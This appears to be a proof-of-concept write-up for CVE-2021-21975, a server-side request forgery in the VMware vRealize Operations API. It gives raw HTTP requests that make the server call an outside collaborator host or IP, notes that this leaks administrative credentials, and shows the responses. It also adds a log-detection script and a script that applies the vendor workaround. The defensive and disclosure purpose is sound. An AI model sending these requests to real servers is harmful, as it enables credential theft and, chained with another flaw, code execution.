[CVE-2021-21975] VMware vRealize Operations Manager API Server Side Request Forgery (SSRF)


vRealize Operations (vROps) is a self-driving IT operations management tool, powered by AI, that spans applications to infrastructure to optimize, plan and scale VMware Cloud and HCI deployments while unifying public cloud monitoring. VMware vRealize Operations Manager API 8.4 and all previous versions are vulnerable to Server Side Request Forgery (SSRF). Successful exploitation may allow an attacker to read or update internal resources, and in this case an attacker can easily steal the administrative credentials of the vROps server. By combining CVE-2021-21975 with CVE-2021-21983, an attacker can run arbitrary code on the remote vRealize Operations server.

Proof of Concept (PoC): In order to exploit this vulnerability, you can use the following request:

POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 70
Connection: close

[
  "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975"
]

The response to the above request is shown below:

HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 20:59:02 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQB
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 151

[
  {
    "address": "h4mv9d2pleyg06fqvl2o4zif46azyo.burpcollaborator.net/CVE-2021-21975",
    "thumbprint": "<html><body>6xal4bz5uui7c8nzvu368ezjlgz</body></html>"
  }
]

Administrative credentials are also disclosed in the Authorization header of the outbound request.

Other Proof of Concepts (PoCs): Alternatively, you can use the following requests to detect the CVE-2021-21975 VMware vRealize Operations Manager API Server Side Request Forgery (SSRF) vulnerability:

POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000/CVE-2021-21975"
]

HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:03 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQE
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 67

[
  {
    "address":"78.171.203.41:8000/CVE-2021-21975",
    "thumbprint":null
  }
]

POST /casa/nodes/thumbprints HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Content-Length: 37
Connection: close

[
  "78.171.203.41:8000"
]

HTTP/1.1 200 200
Date: Fri, 02 Apr 2021 21:00:39 GMT
Server: Apache
X-VSCM-Request-Id: oH006VQJ
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: wss: data: 'unsafe-inline' 'unsafe-eval'; child-src *; worker-src 'self' blob:
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 52

[
  {
    "address":"78.171.203.41:8000",
    "thumbprint":null
  }
]
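
Detection logic for the requests above, as an added example that is not part of the original repository: it parses Apache combined-format access log lines from a vROps node and flags POSTs to /casa/nodes/thumbprints from addresses outside an assumed allowlist of your own cluster nodes (TRUSTED_SOURCES is a placeholder you must fill in). The log lines are constructed.

```python
"""Flag attempts to reach the CVE-2021-21975 SSRF endpoint in Apache access logs
(combined format) of a vRealize Operations node. Added example: the log lines
below are constructed and TRUSTED_SOURCES is an assumption to replace with the
addresses of your own cluster nodes."""
import re
from ipaddress import ip_address, ip_network

SSRF_ENDPOINT = "/casa/nodes/thumbprints"

# Combined log format: host ident user [time] "request" status size "referer" "agent"
_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Assumed: networks of your own vROps cluster nodes, which legitimately call this endpoint.
TRUSTED_SOURCES = [ip_network("10.10.0.0/24")]

def parse_line(line):
    m = _LOG_RE.match(line)
    return m.groupdict() if m else None

def is_suspicious(entry):
    """POST to the thumbprints endpoint from outside the cluster. The status tells you
    whether the endpoint answered (200) or rejected the request (e.g. after the workaround)."""
    if entry is None or entry["method"] != "POST":
        return False
    if not entry["path"].split("?", 1)[0].rstrip("/").lower().endswith(SSRF_ENDPOINT):
        return False
    src = ip_address(entry["src"])
    return not any(src in net for net in TRUSTED_SOURCES)

def scan(lines):
    """Return (source, timestamp, status) for every suspicious request."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if is_suspicious(e):
            hits.append((e["src"], e["ts"], e["status"]))
    return hits

# Constructed sample log lines (203.0.113.0/24 is a documentation range, not a real client).
SAMPLE_LOG = [
    '10.10.0.12 - - [02/Apr/2021:20:58:40 +0000] "POST /casa/nodes/thumbprints HTTP/1.1" 200 151 "-" "Java/1.8.0"',
    '203.0.113.7 - - [02/Apr/2021:20:59:02 +0000] "POST /casa/nodes/thumbprints HTTP/1.1" 200 151 "-" "curl/7.64.1"',
    '203.0.113.7 - - [02/Apr/2021:21:00:03 +0000] "GET /ui/login.action HTTP/1.1" 200 4123 "-" "curl/7.64.1"',
    '203.0.113.9 - - [03/Apr/2021:08:12:11 +0000] "POST /casa/nodes/thumbprints HTTP/1.1" 401 0 "-" "python-requests/2.25"',
]
```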

Workaround Solution: If the patch cannot be installed, or there is no patch for your version of vRealize Operations, the following steps can be taken to work around the issue. There is no impact to vRealize Operations when applying this workaround.

To work around this issue in vRealize Operations, remove a configuration line from casa-security-context.xml:

  1. Log into the Primary node as root via SSH or Console, pressing ALT+F1 in a Console to log in
  2. Open /usr/lib/vmware-casa/casa-webapp/webapps/casa/WEB-INF/classes/spring/casa-security-context.xml
  3. Find and remove the line: <sec:http pattern="/nodes/thumbprints" security='none'/>
  4. Save and close the file
  5. Restart the CaSA service with this command: service vmware-casa restart
  6. Repeat steps 1-5 on all other nodes in the vRealize Operations cluster.
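
A check for steps 2 to 4, as an added example (not VMware's or the repository's code): it looks for the security='none' rule for /nodes/thumbprints in casa-security-context.xml, reports the line numbers where it still appears, and with fix=True removes it after keeping a backup. The file path is the one named in step 2; the sample XML is constructed and the regex is assumed to tolerate attribute order and quote style.

```python
"""Audit or apply the CVE-2021-21975 workaround on a vROps node: the vulnerable
setting is one <sec:http pattern="/nodes/thumbprints" security='none'/> element
in casa-security-context.xml that exempts the endpoint from authentication.
Added example; the sample XML is constructed and the regex tolerates attribute
order and quote style (the vendor line mixes double and single quotes)."""
import re
import shutil
from pathlib import Path

# File named in the workaround (KB 83210); present on every node of the cluster.
CASA_SECURITY_CONTEXT = Path("/usr/lib/vmware-casa/casa-webapp/webapps/casa/"
                             "WEB-INF/classes/spring/casa-security-context.xml")

_VULN_RE = re.compile(
    r"""<sec:http\b(?=[^>]*pattern\s*=\s*["']/nodes/thumbprints["'])"""
    r"""(?=[^>]*security\s*=\s*["']none["'])[^>]*>""",
    re.IGNORECASE,
)

def find_vulnerable_lines(xml_text):
    """1-based line numbers that still carry the unauthenticated thumbprints rule."""
    return [n for n, line in enumerate(xml_text.splitlines(), 1) if _VULN_RE.search(line)]

def apply_workaround(xml_text):
    """Drop every such line (step 3 of the workaround); return (new_text, lines_removed)."""
    kept = [l for l in xml_text.splitlines(keepends=True) if not _VULN_RE.search(l)]
    return "".join(kept), len(xml_text.splitlines()) - len(kept)

def audit_file(path=CASA_SECURITY_CONTEXT, fix=False):
    """Report hits in the real file; with fix=True keep a .bak copy and rewrite it.
    Restarting CaSA (step 5: service vmware-casa restart) remains a manual step."""
    text = path.read_text(encoding="utf-8")
    hits = find_vulnerable_lines(text)
    if hits and fix:
        shutil.copy2(path, path.with_name(path.name + ".bak"))
        path.write_text(apply_workaround(text)[0], encoding="utf-8")
    return hits

# Constructed sample resembling the relevant section (not the real vendor file).
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<beans:beans xmlns:beans="http://www.springframework.org/schema/beans"
             xmlns:sec="http://www.springframework.org/schema/security">
  <sec:http pattern="/nodes/thumbprints" security='none'/>
  <sec:http pattern="/health" security='none'/>
  <sec:http use-expressions="true">
    <sec:intercept-url pattern="/**" access="isAuthenticated()"/>
  </sec:http>
</beans:beans>
"""
```

Run audit_file() on each node in turn; an empty list means the node already has the workaround (or the patch) in place.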

For more information, visit the following pages.

https://kb.vmware.com/s/article/83210
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
https://f5.pm/go-66465.html

Contributors

murataydemir
